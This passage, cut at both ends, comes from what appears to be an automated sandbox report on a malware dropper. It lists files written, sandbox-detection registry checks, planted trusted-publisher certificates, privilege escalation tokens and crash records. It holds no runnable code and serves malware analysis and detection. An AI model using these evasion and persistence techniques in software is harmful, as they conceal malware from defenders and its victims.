(x86)\INL Corpo Brovse\is-IGEIL.tmp Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-KQJ9I.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-ROUOF.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\INL Corpo Brovse\libass.dll Setup.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-6VBA9.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\Company\NewProduct\customer3.exe 6dBlR9ES_h9uZiKUQGcURO6C.exe File created C:\Program Files (x86)\INL Corpo Brovse\is-FHAVU.tmp Setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\jooyu.exe 6dBlR9ES_h9uZiKUQGcURO6C.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe 2aSLfjkYYD2DshoQd7V_7CdH.exe File created C:\Program Files (x86)\MaskVPN\is-VPTAH.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\is-FAANM.tmp Esplorarne.exe.com File created C:\Program Files (x86)\MaskVPN\driver\win732\is-7NA2S.tmp Esplorarne.exe.com File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll Esplorarne.exe.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 28 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4744 3684 WerFault.exe kWs5sSjR4k3xXHmO4XLag8d6.exe 2528 3104 WerFault.exe W4sDxcb8D309KQCgTNmXJRUk.exe 3392 968 WerFault.exe JReCxrSZ5O_Lnjfb2WaAEeOU.exe 2932 2464 WerFault.exe DeXoDhHO4fs8ErAGxqZ46K2p.exe 1288 4568 WerFault.exe xmwrvdcY_Yfi3N5BkNTNaobs.exe 3628 1296 WerFault.exe LGCH2-401_2021-08-18_14-40.exe 6936 4996 WerFault.exe askinstall53.exe 6688 4704 WerFault.exe vLMv9enxfOQSyOhkmUT9HBGQ.exe 5128 4676 WerFault.exe 4175631.exe 6064 1192 WerFault.exe rundll32.exe 448 4000 WerFault.exe f4C7slnxa7XtCJZDRhYnwZ3y.exe 6420 1684 WerFault.exe xXPw8gzq7kyFNlvwvOjz3cm1.exe 7544 4720 WerFault.exe 1480338.exe 7536 6856 WerFault.exe lDYC80QV081554Naoz9Vbsa4.exe 7460 4456 WerFault.exe xWLFeZ9BHAKzdr9cDlb9z8je.exe 6972 5584 WerFault.exe 6961886.exe 7108 5564 WerFault.exe 3010462.exe 6264 6396 WerFault.exe 7008527.exe 6352 3676 WerFault.exe vdi_compiler.exe 4612 3032 WerFault.exe 8387600.exe 8152 5208 WerFault.exe 7117.exe 7524 6504 WerFault.exe 80A8.exe 7580 5812 WerFault.exe GcleanerEU.exe 6584 5320 WerFault.exe anyname.exe 4004 3244 WerFault.exe gcleaner.exe 5832 6484 WerFault.exe explorer.exe 7184 6284 WerFault.exe EC19.exe 2800 2148 WerFault.exe MendacityTrizonal_2021-08-21_22-48.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
A2MeOTLlVVy7eGu_Qu_gdUsq.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A2MeOTLlVVy7eGu_Qu_gdUsq.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A2MeOTLlVVy7eGu_Qu_gdUsq.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A2MeOTLlVVy7eGu_Qu_gdUsq.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Enumerates system info in registry 2 TTPs 30 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comWerFault.exeWerFault.exeEsplorarne.exe.comdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Esplorarne.exe.com Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Esplorarne.exe.com Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3348 taskkill.exe 1736 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
Esplorarne.exe.comdescription ioc process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E Esplorarne.exe.com Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache Esplorarne.exe.com -
Processes:
Esplorarne.exe.comdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Esplorarne.exe.com Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Esplorarne.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Esplorarne.exe.com -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 136 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 143 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 233 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 238 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Setup (5).exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeEsplorarne.exe.comxtect12.exeNGSx7_M3OHWSeBxQFu9pEcYE.exet7Xvr_mcY4U0EgrksDdHs2hI.exepIQ3ulIMRDHkTcxzXZA50m3y.exegwyroycDer67hXuPDw56Y8dx.exemsedge.exepid process 5116 Setup (5).exe 5116 Setup (5).exe 4744 WerFault.exe 4744 WerFault.exe 3392 WerFault.exe 3392 WerFault.exe 2932 WerFault.exe 2932 WerFault.exe 2528 WerFault.exe 2528 WerFault.exe 1288 WerFault.exe 1288 WerFault.exe 3628 WerFault.exe 3628 WerFault.exe 5756 Esplorarne.exe.com 5756 Esplorarne.exe.com 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5292 xtect12.exe 5000 NGSx7_M3OHWSeBxQFu9pEcYE.exe 5000 NGSx7_M3OHWSeBxQFu9pEcYE.exe 4804 t7Xvr_mcY4U0EgrksDdHs2hI.exe 4804 t7Xvr_mcY4U0EgrksDdHs2hI.exe 3272 pIQ3ulIMRDHkTcxzXZA50m3y.exe 3272 pIQ3ulIMRDHkTcxzXZA50m3y.exe 3060 gwyroycDer67hXuPDw56Y8dx.exe 3060 gwyroycDer67hXuPDw56Y8dx.exe 4676 msedge.exe 4676 msedge.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
A2MeOTLlVVy7eGu_Qu_gdUsq.exepid process 6852 A2MeOTLlVVy7eGu_Qu_gdUsq.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
7773517.exe7514811.exepid process 5912 7773517.exe 2212 7514811.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
bp6rLacE0rY6LNrjOO_TxmEr.exeWerFault.exe4175631.exeGaGn0YZ1Xn4dsxDCBdKU27Z4.exetaskkill.exegwyroycDer67hXuPDw56Y8dx.exepIQ3ulIMRDHkTcxzXZA50m3y.exeNGSx7_M3OHWSeBxQFu9pEcYE.exe4TxEGrcFaLMUzJf7EnXhU_B_.exet7Xvr_mcY4U0EgrksDdHs2hI.exe1480338.exeaskinstall53.exe5632698.exeCleaner.exeLivelyScreenRecS1.9.exe6961886.exe3010462.exetvwYgrb2f429aQuOGro1rbsa.exetaskkill.exe1029648.exe1309205.exemsiexec.exeCleaner Installation.exedescription pid process Token: SeDebugPrivilege 5036 bp6rLacE0rY6LNrjOO_TxmEr.exe Token: SeRestorePrivilege 4744 WerFault.exe Token: SeBackupPrivilege 4744 WerFault.exe Token: SeDebugPrivilege 4676 4175631.exe Token: SeDebugPrivilege 3852 GaGn0YZ1Xn4dsxDCBdKU27Z4.exe Token: SeDebugPrivilege 3348 taskkill.exe Token: SeDebugPrivilege 3060 gwyroycDer67hXuPDw56Y8dx.exe Token: SeDebugPrivilege 3272 pIQ3ulIMRDHkTcxzXZA50m3y.exe Token: SeDebugPrivilege 5000 NGSx7_M3OHWSeBxQFu9pEcYE.exe Token: SeDebugPrivilege 2344 4TxEGrcFaLMUzJf7EnXhU_B_.exe Token: SeDebugPrivilege 4804 t7Xvr_mcY4U0EgrksDdHs2hI.exe Token: SeDebugPrivilege 4720 1480338.exe Token: SeCreateTokenPrivilege 4996 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 4996 askinstall53.exe Token: SeLockMemoryPrivilege 4996 askinstall53.exe Token: SeIncreaseQuotaPrivilege 4996 askinstall53.exe Token: SeMachineAccountPrivilege 4996 askinstall53.exe Token: SeTcbPrivilege 4996 askinstall53.exe Token: SeSecurityPrivilege 4996 askinstall53.exe Token: SeTakeOwnershipPrivilege 4996 askinstall53.exe Token: SeLoadDriverPrivilege 4996 askinstall53.exe Token: SeSystemProfilePrivilege 4996 askinstall53.exe Token: SeSystemtimePrivilege 4996 askinstall53.exe Token: SeProfSingleProcessPrivilege 4996 askinstall53.exe Token: SeIncBasePriorityPrivilege 4996 askinstall53.exe Token: SeCreatePagefilePrivilege 4996 askinstall53.exe Token: SeCreatePermanentPrivilege 4996 askinstall53.exe Token: SeBackupPrivilege 4996 askinstall53.exe Token: SeRestorePrivilege 4996 askinstall53.exe Token: SeShutdownPrivilege 4996 askinstall53.exe Token: SeDebugPrivilege 4996 askinstall53.exe 